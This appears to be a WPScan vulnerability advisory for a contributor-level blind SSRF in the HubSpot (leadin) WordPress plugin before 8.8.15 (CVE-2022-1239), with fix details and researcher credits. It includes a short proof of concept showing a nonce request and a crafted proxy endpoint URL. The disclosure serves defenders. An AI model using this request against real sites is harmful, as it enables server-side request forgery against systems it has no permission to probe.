WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

HubSpot < 8.8.15 - Contributor+ Blind SSRF

Description

The plugin does not validate the proxy URL given to the proxy REST endpoint, which could allow users with the edit_posts capability (by default contributor and above) to perform SSRF attacks

Proof of Concept

As an authenticated user with the edit_posts capability, get REST nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce

https://example.com/wp-json/leadin/v1/[email protected]&_wpnonce=8aaf916bd9

Affects Plugins

leadin
Fixed in version 8.8.15

References

CVE
CVE-2022-1239

Classification

Type

SSRF

OWASP top 10
A1: Injection
CWE
CWE-918

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter website
https://tomorrowisnew.com
Submitter twitter
tomorrowisnew_
Verified

Yes

WPVDB ID
4ad2bb96-87a4-4590-a058-b03b33d2fcee

Timeline

Publicly Published

2022-04-11 (about 11 months ago)

Added

2022-04-11 (about 11 months ago)

Last Updated

2022-04-13 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin